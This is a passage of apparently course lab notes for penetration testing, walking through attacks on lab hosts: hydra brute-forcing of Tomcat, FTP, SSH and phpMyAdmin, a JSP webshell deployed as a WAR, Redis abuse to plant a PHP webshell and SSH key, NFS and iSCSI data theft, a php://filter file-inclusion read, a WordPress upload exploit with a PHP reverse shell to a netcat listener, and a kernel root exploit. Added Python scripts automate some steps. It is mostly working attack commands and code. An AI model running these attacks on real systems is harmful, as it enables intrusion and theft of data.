  802. ------ then type 'out' ----- this closes the file handle...
  803.  
  804.  
  805. gcc -o boom exploit.c
  806.  
  807. ./boom
  808.  
  809. id
  810.  
  811.  
  812. -----------------------------------------------------------------------
  813.  
  814. ---------------------------Type This-----------------------------------
  815.  
  816. hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
  817. -----------------------------------------------------------------------
  818.  
  819.  
  820.  
  821.  
  822.  
  823. -------------------------------------------index.jsp-------------------------------------------
  824. <FORM METHOD=GET ACTION='index.jsp'>
  825. <INPUT name='cmd' type=text>
  826. <INPUT type=submit value='Run'>
  827. </FORM>
  828. <%@ page import="java.io.*" %>
  829. <%
  830. String cmd = request.getParameter("cmd");
  831. String output = "";
  832. if(cmd != null) {
  833. String s = null;
  834. try {
  835. Process p = Runtime.getRuntime().exec(cmd,null,null);
  836. BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
  837. while((s = sI.readLine()) != null) { output += s+"</br>"; }
  838. } catch(IOException e) { e.printStackTrace(); }
  839. }
  840. %>
  841. <pre><%=output %></pre>
  842. -------------------------------------------index.jsp-------------------------------------------
  843.  
  844. ***** now pack the webshell *****
  845.  
  846.  
  847. ---------------------------Type This-----------------------------------
  848.  
  849. mkdir webshell
  850. cp index.jsp webshell
  851.  
  852. cd webshell
  853. jar -cvf ../webshell.war *
  854. -----------------------------------------------------------------------
  855.  
  856.  
  857. Deploy the WAR file using the built-in deploy option on the manager web-page.
  858. Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
  859. now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/
  860.  
  861.  
  862.  
  863. ****** This section isn't finished ******
  864.  
  865. ---------------------------Type This-----------------------------------
  866.  
  867. cd ~/toolz/metasploit
  868.  
  869. ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
  870.  
  871. jar tf ~/bind7777.war
  872. -----------------------------------------------------------------------
  873.  
  874. ****** This section isn't finished ******
  875.  
  876. Google is your friend hahahahahahahah........
  877.  
  878.  
  879. #################
  880. # Attacking FTP #
  881. #################
  882.  
  883. ---------------------------Type This-----------------------------------
  884.  
  885. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
  886.  
  887. cd ~/toolz/hydra
  888.  
  889. hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp
  890.  
  891. ftp
  892. open 172.31.2.24
  893. admin
  894. admin
  895. pwd
  896. ls -lah
  897.  
  898. ls ../../
  899. -----------------------------------------------------------------------
  900.  
  901.  
  902. #################
  903. # Attacking SSH #
  904. #################
  905.  
  906. ---------------------------Type This-----------------------------------
  907.  
  908. sudo apt-get install -y libssh-dev
  909. infosecaddicts
  910. cd ~/toolz/hydra
  911. make clean
  912. ./configure
  913. make
  914. sudo make install
  915.  
  916.  
  917. hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh
  918.  
  919. ssh -p 1322 admin@172.31.2.24
  920.  
  921.  
  922. -------------------------------
  923.  
  924. cd ~/toolz/metasploit
  925.  
  926. ./msfconsole
  927.  
  928. use auxiliary/scanner/ssh/ssh_enumusers
  929.  
  930. set USER_FILE /home/infosecaddicts/list.txt
  931.  
  932. set STOP_ON_SUCCESS true
  933.  
  934. set RHOSTS 172.31.2.24
  935.  
  936. set RPORT 1322
  937.  
  938. run
  939.  
  940.  
  941.  
  942.  
  943.  
  944. use auxiliary/scanner/ssh/ssh_login
  945.  
  946. set USER_FILE /home/infosecaddicts/list.txt
  947.  
  948. set PASS_FILE /home/infosecaddicts/list.txt
  949.  
  950. set STOP_ON_SUCCESS true
  951.  
  952. set RHOSTS 172.31.2.24
  953.  
  954. set RPORT 1322
  955.  
  956. run
  957.  
  958.  
  959. sessions -l
  960.  
  961. sessions -u 1
  962.  
  963. sessions -i 1
  964.  
  965. id
  966.  
  967. -----------------------------------------------------------------------
  968.  
  969.  
  970. ########################
  971. # Attacking phpMyAdmin #
  972. ########################
  973. ****** This section isn't finished ******
  974.  
  975. ---------------------------Type This-----------------------------------
  976.  
  977. hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
  978. -----------------------------------------------------------------------
  979.  
  980. ****** This section isn't finished ******
  981.  
  982. Google is your friend hahahahahahahah........
  983.  
  984.  
  985.  
  986. ---------------------------Type This-----------------------------------
  987.  
  988. wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
  989.  
  990. python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
  991. -----------------------------------------------------------------------
  992.  
  993.  
  994.  
  995.  
  996.  
  997.  
  998. ####################
  999. # Attacking Joomla #
  1000. ####################
  1001.  
  1002. ---------------------------Type This-----------------------------------
  1003.  
  1004. cd ~/toolz/metasploit
  1005.  
  1006. ./msfconsole
  1007.  
  1008. use use auxiliary/scanner/http/joomla_plugins
  1009.  
  1010. set RHOSTS 172.31.2.24
  1011.  
  1012. set RPORT 8080
  1013.  
  1014. run
  1015. -----------------------------------------------------------------------
  1016.  
  1017.  
  1018. ****** This section isn't finished ******
  1019. Google is your friend hahahahahahahah........
  1020.  
  1021. #####################
  1022. # Attacking Jenkins #
  1023. #####################
  1024.  
  1025.  
  1026. ****** This section isn't finished ******
  1027. Google is your friend hahahahahahahah........
  1028.  
  1029. #################
  1030. # Attacking NFS #
  1031. #################
  1032.  
  1033. ---------------------------Type This-----------------------------------
  1034.  
  1035. sudo apt install -y rpcbind nfs-common
  1036.  
  1037. rpcinfo -s 172.31.2.24
  1038. ***** rpcinfo lists the RPC programs registered with the portmapper; mountd and nfs in the list means NFS is up *****
  1039. showmount -e 172.31.2.24
  1040. ***** showmount -e prints each export and which clients may mount it; "*" or "(everyone)" means any host on the network, you included *****
  1041. sudo /bin/bash
  1042.  
  1043. mkdir /tmp/nfs
  1044.  
  1045. mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock
  1046. ***** -o nolock skips NFS file locking (NLM), so the mount works without rpc.statd running on your VM *****
  1047. ls /tmp/nfs
  1048.  
  1049. cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
  1050.  
  1051. umount -l /tmp/nfs
  1052.  
  1053. exit
  1054.  
  1055. sudo apt-cache search fcrackzip
  1056.  
  1057. sudo apt-get install -y fcrackzip
  1058.  
  1059. fcrackzip -u backup.tar.bz2.zip
  1060. ***** -u makes fcrackzip confirm each candidate with unzip, which weeds out the false positives its quick check produces; the lab archive's password is aaaaaa *****
  1061. unzip -P aaaaaa backup.tar.bz2.zip
  1062.  
  1063. tar jxf backup.tar.bz2
  1064. -----------------------------------------------------------------------
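Added example (not from the course notes): the same enumerate-then-mount procedure as above, generalized to every export the host offers to everyone. It parses showmount -e output, picks the exports with a "*" or "(everyone)" client list, mounts each one read-only under a temporary directory, lists what is inside and unmounts it. The showmount sample is constructed, not captured from the lab; the mount options other than nolock (ro, soft, timeo) are my additions so a dead server cannot hang the script. Mounting needs root.

```python
"""Find world-mountable NFS exports and list them read-only (added example)."""
import subprocess
import sys
import tempfile
from pathlib import Path

# Constructed showmount -e output (not captured from 172.31.2.24).
SAMPLE_SHOWMOUNT = """Export list for 172.31.2.24:
/backup  *
/home    10.0.0.0/8
/srv/www (everyone)
"""


def parse_exports(showmount_output):
    """Return [(export_path, [client, ...]), ...] from `showmount -e` text."""
    exports = []
    for line in showmount_output.splitlines():
        parts = line.split()
        if not parts or line.startswith("Export list"):
            continue
        path, clients = parts[0], parts[1:]
        # clients are comma separated; "(everyone)" is how showmount prints an open export
        clients = [c.strip("()") for c in ",".join(clients).split(",") if c]
        exports.append((path, clients))
    return exports


def world_mountable(exports):
    """Exports any host may mount, which is what the /backup export in the lab is."""
    return [path for path, clients in exports if any(c in ("*", "everyone") for c in clients)]


def mount_readonly(host, export, mountpoint):
    """ro so nothing is changed on the target; nolock as in the notes above;
    soft,timeo=30 so an unresponsive server returns an error instead of hanging."""
    subprocess.run(["mount", "-t", "nfs", "-o", "ro,nolock,soft,timeo=30",
                    f"{host}:{export}", str(mountpoint)], check=True)


def pull_exports(host):
    """Mount every open export in turn and list its files."""
    out = subprocess.run(["showmount", "-e", host], check=True,
                         capture_output=True, text=True).stdout
    for export in world_mountable(parse_exports(out)):
        mountpoint = Path(tempfile.mkdtemp(prefix="nfs-"))
        try:
            mount_readonly(host, export, mountpoint)
            for entry in mountpoint.rglob("*"):
                print(f"{export}: {entry.relative_to(mountpoint)}")
        finally:
            subprocess.run(["umount", "-l", str(mountpoint)])


if __name__ == "__main__":
    pull_exports(sys.argv[1])   # usage (as root): python nfs_open_exports.py 172.31.2.24
```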
  1065.  
  1066.  
  1067. ###################
  1068. # Attacking Redis #
  1069. ###################
  1070.  
  1071. ---------------------------Type This-----------------------------------
  1072.  
  1073. sudo nmap -p 6379 --script=redis-info 172.31.2.24
  1074. ***** the sudo password is infosecaddicts whenever you are prompted. redis-info only returns data when the server answers INFO without AUTH, which is the unauthenticated setup everything below depends on *****
  1075.  
  1076. sudo apt-get install -y redis-tools
  1077.  
  1078. redis-cli -h 172.31.2.24
  1079.  
  1080. CONFIG SET dir /var/www/html/main
  1081. ***** dir is where the next dump is written; /var/www/html/main is the web root on this lab host and has to be writable by the user redis runs as *****
  1082. CONFIG GET dir
  1083.  
  1084. config set dbfilename boom.php
  1085.  
  1086. CONFIG GET dbfilename
  1087.  
  1088. SET cmd "<?php system($_GET['joe']); ?>"
  1089.  
  1090. BGSAVE
  1091. ***** the dump is an RDB file, so the PHP tag sits between binary bytes; PHP echoes the bytes outside <?php ... ?> as-is and executes what is inside, so the webshell still runs *****
  1092. http://172.31.2.24/boom.php
  1093.  
  1094. http://172.31.2.24/boom.php?joe=id
  1095.  
  1096. ***** The same trick aimed at sshd starts by padding your public key with blank lines, so the RDB bytes on either side stay off the key's own line: *****
  1097. (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
  1098. ***** then store foo.txt as a value (redis-cli -x set reads the value from stdin), point dir at the target user's .ssh directory and dbfilename at authorized_keys, and SAVE; sshd reads authorized_keys line by line and skips lines it cannot parse, so the key line is all that matters *****
  1099.  
  1100. ****** This section isn't finished ******
  1101. Google is your friend hahahahahahahah........
  1102.  
  1103. cd ~/toolz/metasploit
  1104.  
  1105. ./msfconsole
  1106.  
  1107. use auxiliary/scanner/redis/file_upload
  1108.  
  1109. set RHOSTS 172.31.2.24
  1110.  
  1111. set LocalFile
  1112.  
  1113. ****** This section isn't finished ******
  1114. Google is your friend hahahahahahahah........
  1115.  
  1116.  
  1117.  
  1118.  
  1119.  
  1120.  
  1121.  
  1122. ###################
  1123. # Attacking iSCSI #
  1124. ###################
  1125.  
  1126. ---------------------------Type This-----------------------------------
  1127. sudo nmap -sV -p 3260 172.31.2.217
  1128.  
  1129. sudo apt install open-iscsi
  1130.  
  1131. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  1132. ***** -t st is SendTargets discovery: the portal lists the target IQNs it offers. Writing the portal as 172.31.2.217:3260 is equivalent, 3260 is the default iSCSI port *****
  1133. sudo iscsiadm -m node -p 172.31.2.217 --login
  1134. ***** the login needs no credentials because the target has no CHAP authentication; the LUN now shows up as a new block device on your VM *****
  1135. sudo /bin/bash
  1136.  
  1137. fdisk -l
  1138. ***** /dev/sda with its /dev/sda5 "Linux swap / Solaris" partition is your own VM's disk; the iSCSI LUN is the newly added device, /dev/sdb in this lab *****
  1139. mkdir /mnt/217vm
  1140.  
  1141. mount /dev/sdb /mnt/217vm
  1142.  
  1143. cd /mnt/217vm
  1144.  
  1145. ls
  1146.  
  1147. cat flag1.txt
  1148.  
  1149. file bobsdisk.dsk
  1150. ***** file identifies the filesystem inside the image, so mount can loop-mount it straight from the file *****
  1151. mkdir /media/bobsdisk
  1152.  
  1153. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1154.  
  1155. cd /media/bobsdisk/
  1156.  
  1157. ls
  1158.  
  1159. cat ToAlice.eml | grep flag
  1160.  
  1161. cat ToAlice.eml
  1162. ***** look for supercalifragilisticoespialidoso - the mail leaks the passphrase for the encrypted CSV ******
  1163.  
  1164. file ToAlice.csv.enc
  1165.  
  1166. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1167. supercalifragilisticoespialidoso
  1168. ***** type the passphrase at the "enter aes-256-cbc decryption password" prompt. -md sha256 selects the digest openssl enc uses to derive the key and IV from the passphrase; OpenSSL 1.1.0 changed the default from md5 to sha256, so a "bad decrypt" here usually means the file was encrypted under the other digest, retry with -md md5 *****
  1169.  
  1170. ls
  1171.  
  1172. cat ToAlice.csv
  1173. ***** when finished, umount /media/bobsdisk and /mnt/217vm, then iscsiadm -m node -p 172.31.2.217 --logout drops the session *****
  1174. -----------------------------------------------------------------------
  1215.  
  1216. -----------------------------------------------------
  1217. Web Path,Reason
  1218. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  1219. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  1220. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  1221.  
  1222. -----------------------------------------------------
  1223.  
  1224. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  1225. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  1226. -- view source
  1227.  
  1228. Found this string in the source:
  1229. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  1230. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  1231. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  1232. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  1233. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  1234. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  1235. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  1236. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  1237. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  1238. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  1239.  
  1240. ------ https://www.base64decode.org/ -------
  1241. ------ Decodes to a Seinfeld "Soup Nazi" scene ending in "NO FLAG FOR YOU", so no flag here -----
  1242.  
  1243.  
  1244. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  1245. -- view source --
  1246. -- Nothing in source --
  1247.  
  1248. Browsed to the flag link:
  1249. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  1250. -- view source --
  1251. -- Nothing in source --
  1252.  
  1253.  
  1254. The p parameter includes a local PHP file by name, so wrap the name in PHP's php://filter stream wrapper with convert.base64-encode: the include then returns the file's source base64-encoded instead of executing it, which is how flag.php can be read even though including it directly dies with "Ooooh! So close..":
  1255. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  1256. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1257. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  1258.  
  1259. ------ https://www.base64decode.org/ -------
  1260. Decode the string returned for flag.php:
  1261. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1262.  
  1263. -------------------------------------------------------------------
  1264. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  1265. -------------------------------------------------------------------
  1266. <?php
  1267. defined ('VIAINDEX') or die('Ooooh! So close..');
  1268. ?>
  1269. <h1>Flag</h1>
  1270. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  1271. <img src="trollface.png" />
  1272. <?php
  1273. // Ok, ok. Here's your flag!
  1274. //
  1275. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  1276. //
  1277. // Well done, you're doing great so far!
  1278. // Next step. SHELL!
  1279. //
  1280. //
  1281. // Oh. That flag above? You're gonna need it...
  1282. ?>
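Added example (not from the course notes): the php://filter source read above done from Python instead of a browser plus base64decode.org. It builds the wrapper URL, pulls the base64 run out of the returned page, decodes it and greps the source for flag{...} strings. FLAG_PHP_B64 is the string recovered from flag.php above, so the offline check reproduces the flag4 result; the parameter name p and the base URL are the lab's, everything else is assumed. Only read_source() touches the network.

```python
"""Read PHP source through an include parameter with php://filter (added example)."""
import base64
import re
import sys
import urllib.parse
import urllib.request

# base64 blob returned for resource=flag.php, copied from the notes above
FLAG_PHP_B64 = "PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg=="


def filter_url(base_url, param, resource):
    """<base>?<param>=php://filter/convert.base64-encode/resource=<file>, as typed above."""
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{base_url}?{param}={urllib.parse.quote(wrapper, safe='/:=')}"


def extract_base64(page_text):
    """First long base64 run in the page; the include prints it inside whatever HTML wraps it."""
    m = re.search(r"[A-Za-z0-9+/]{40,}={0,2}", page_text)
    return m.group(0) if m else None


def decode_filter_output(blob):
    """Base64 to source text; stray bytes are replaced rather than raising."""
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def find_flags(source):
    """flag{...}, flag4{...} and similar markers hidden in comments or strings."""
    return re.findall(r"flag\d*\{[0-9a-f]+\}", source)


def read_source(base_url, param, resource):
    """Fetch one file through the wrapper and return its decoded source (None if no blob)."""
    url = filter_url(base_url, param, resource)
    html = urllib.request.urlopen(url, timeout=10).read().decode(errors="replace")
    blob = extract_base64(html)
    return decode_filter_output(blob) if blob else None


if __name__ == "__main__":
    # usage: python php_filter_read.py http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/ p flag.php
    src = read_source(*sys.argv[1:4])
    print(src)
    print("flags:", find_flags(src or ""))
```

The die() in flag.php fires only when the file is executed; the filter wrapper hands the include a base64 stream instead, which is why the same parameter that returns a troll page as HTML returns the full source this way.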
  1283.  
  1284. ######################
  1285. # Attacking Minotaur #
  1286. ######################
  1287.  
  1288. Step 1: Portscan/Bannergrab the target host
  1289. ---------------------------Type This-----------------------------------
  1290. sudo nmap -sV 172.31.2.117
  1291. -----------------------------------------------------------------------
  1292.  
  1293.  
  1294.  
  1295. Step 2: Vulnerability scan the web server
  1296. ---------------------------Type This-----------------------------------
  1297. cd ~/toolz/
  1298.  
  1299. rm -rf nikto*
  1300.  
  1301. git clone https://github.com/sullo/nikto.git Nikto2
  1302.  
  1303. cd ~/toolz/Nikto2/program
  1304.  
  1305. perl nikto.pl -h 172.31.2.117
  1306. -----------------------------------------------------------------------
  1307.  
  1308.  
  1309.  
  1310. Step 3: Directory brute-force the webserver
  1311. ---------------------------Type This-----------------------------------
  1312. cd ~/toolz
  1313.  
  1314. git clone https://github.com/v0re/dirb.git
  1315.  
  1316. cd dirb/
  1317.  
  1318. ./configure
  1319.  
  1320. make
  1321.  
  1322. dirb
  1323.  
  1324. ./dirb http://172.31.2.117 wordlists/big.txt
  1325. -----------------------------------------------------------------------
  1326.  
  1327. ### dirb output ###
  1328. ==> DIRECTORY: http://172.31.2.117/bull/
  1329. -----------------------------------------------------------------------
  1330.  
  1331.  
  1332. Step 4: Run wordpress vulnerability scanner
  1333. ---------------------------Type This-----------------------------------
  1334. sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
  1335.  
  1336. cd ~/toolz
  1337.  
  1338. rm -rf wpsca*
  1339.  
  1340. git clone https://github.com/wpscanteam/wpscan.git
  1341.  
  1342. cd wpscan
  1343.  
  1344. sudo gem install bundler && bundle install --without test development
  1345.  
  1346. rbenv install 2.5.0-dev
  1347.  
  1348. ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
  1349. -----------------------------------------------------------------------
  1350.  
  1351.  
  1352.  
  1353.  
  1354. Step 5: Attack vulnerable Wordpress plugin with Metasploit
  1355. ---------------------------Type This-----------------------------------
  1356. cd ~/toolz/metasploit
  1357.  
  1358. ./msfconsole
  1359.  
  1360. use exploit/unix/webapp/wp_slideshowgallery_upload
  1361.  
  1362. set RHOST 172.31.2.117
  1363.  
  1364. set RPORT 80
  1365.  
  1366. set TARGETURI /bull
  1367.  
  1368. set WP_USER bully
  1369.  
  1370. set WP_PASSWORD Bighornedbulls
  1371.  
  1372. exploit
  1373. -----------------------------------------------------------------------
  1374.  
  1375. That didn't work: a reverse shell cannot connect from a lab host back to an address in the VPN client range.
  1376. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  1377. and then attacking other students from the lab network.
  1378.  
  1379.  
  1380. ---------------------------Type This-----------------------------------
  1381. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  1382.  
  1383. tar -zxvf php-reverse-shell-1.0.tar.gz
  1384.  
  1385. cd ~/toolz/php-reverse-shell-1.0/
  1386.  
  1387. nano php-reverse-shell.php
  1388. -----------------------------------------------------------------------
  1389. ***** change the $ip and $port variables to a host that you have already compromised in the network
  1390. ***** for this example I chose 172.31.2.64 and kept port 1234
  1391.  
  1392.  
  1393. ---------------------------Type This-----------------------------------
  1394. chmod 777 php-reverse-shell.php
  1395. cp php-reverse-shell.php ..
  1396. -----------------------------------------------------------------------
  1397.  
  1398.  
  1399.  
  1400. ----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
  1401. https://www.exploit-db.com/raw/34681/
  1402. ***** EDB-ID 34681 is the WordPress Slideshow Gallery 1.4.6 arbitrary file upload; it needs a valid WordPress login, which is why the bully account is passed in *****
  1403. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  1404. ***** the script uploads the file into wp-content/uploads/slideshow-gallery/ on the target, which is the URL requested below *****
  1405. -----------------------------------------------------------------------
  1406.  
  1407.  
  1408.  
  1409. Set up netcat listener on previously compromised host
  1410. ---------------------------Type This-----------------------------------
  1411. ssh -l webmin 172.31.2.64
  1412. webmin1980
  1413. ***** webmin1980 is the password of the webmin account on .64 *****
  1414. python -c 'import pty;pty.spawn("/bin/bash")'
  1415.  
  1416. cd /tmp
  1417.  
  1418. ./boom2
  1419. ***** boom2 is a previously compiled local root exploit left in /tmp on .64; it is optional for the listener, since 1234 is an unprivileged port and nc can bind it as webmin *****
  1420. nc -lvp 1234
  1421. ***** leave this running; the next request to the uploaded PHP file connects back to it *****
  1422. -----------------------------------------------------------------------
  1423.  
  1424.  
  1425.  
  1426.  
  1427. ---------------------Type This in your browser ------------------------
  1428. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  1429. -----------------------------------------------------------------------
  1430.  
  1431.  
  1432. Now check your listener to see if you got the connection
  1433. ---------------------------Type This-----------------------------------
  1434. id
  1435.  
  1436. /sbin/ifconfig
  1437.  
  1438. python -c 'import pty;pty.spawn("/bin/bash")'
  1439. -----------------------------------------------------------------------
  1440. ---------------------------Type This-----------------------------------
  1441. cd /tmp
  1442. cat > exploit2.c << 'out'
  1443. -----------------------------------------------------------------------
  1444. **************paste in the content from here *****************
  1445. https://www.exploit-db.com/raw/37292/
  1446. ***** EDB-ID 37292 is the overlayfs local root exploit (CVE-2015-1328) for Ubuntu 12.04/14.04/14.10/15.04 kernels 3.13.0 up to 3.19; check uname -r on the target before bothering *****
  1447. **************hit enter a few times *****************
  1448. ***** the delimiter is quoted ('out') so the shell does not expand $ or backticks inside the pasted C source, and > rather than >> so pasting twice does not append a second copy *****
  1449. ---------------------------Type This-----------------------------------
  1450. out
  1451.  
  1452.  
  1453. gcc -o boom2 exploit2.c
  1454.  
  1455. ./boom2
  1456.  
  1457. id
  1458. -----------------------------------------------------------------------
  1459.  
  1460. ......YEAH - do the happy dance!!!!
  1461.  
  1462.  
  1463.  
  1464.  
  1465.  
  1466. ###################
  1467. # Attacking Sedna #
  1468. ###################
  1469.  
  1470. Attack steps:
  1471. -------------
  1472.  
  1473.  
  1474.  
  1475. Step 1: Ping sweep the target network
  1476. ---------------------------Type This-----------------------------------
  1477. nmap -sP 172.31.2.0/24
  1478. -----------------------------------------------------------------------
  1479.  
  1480.  
  1481.  
  1482.  
  1483.  
  1484.  
  1485. Step 2: Port scan/Bannergrab the target host
  1486. ---------------------------Type This-----------------------------------
  1487. sudo nmap -sV 172.31.2.86
  1488. -----------------------------------------------------------------------
  1489.  
  1490.  
  1491. PORT STATE SERVICE VERSION
  1492. 22/tcp open ssh (protocol 2.0)
  1493. 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
  1494. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1495. 110/tcp open pop3 Dovecot pop3d
  1496. 111/tcp open rpcbind 2-4 (RPC #100000)
  1497. 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
  1498. 143/tcp open imap Dovecot imapd
  1499. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
  1500. 514/tcp filtered shell
  1501. 993/tcp open ssl/imap Dovecot imapd
  1502. 995/tcp open ssl/pop3 Dovecot pop3d
  1503. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  1504. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
  1505. SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
  1506. SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
  1507.  
  1508. Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  1509. Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds
  1510.  
  1511.  
  1512.  
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519. Step 3: Vulnerability scan the webserver ports
  1520. ---------------------------Type This-----------------------------------
  1521. cd ~/toolz/
  1522.  
  1523. rm -rf nikto*
  1524.  
  1525. git clone https://github.com/sullo/nikto.git Nikto2
  1526.  
  1527. cd Nikto2/program
  1528.  
  1529. perl nikto.pl -h 172.31.2.86
  1530.  
  1531. perl nikto.pl -h 172.31.2.86:8080
  1532. -----------------------------------------------------------------------
  1533.  
  1534.  
  1535.  
  1536.  
  1537.  
  1538. Step 4: Perform directory bruteforce against the target host
  1539. ---------------------------Type This-----------------------------------
  1540. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1541.  
  1542. perl Webr00t.pl -h 172.31.2.86 -v
  1543. -----------------------------------------------------------------------
  1544.  
  1545.  
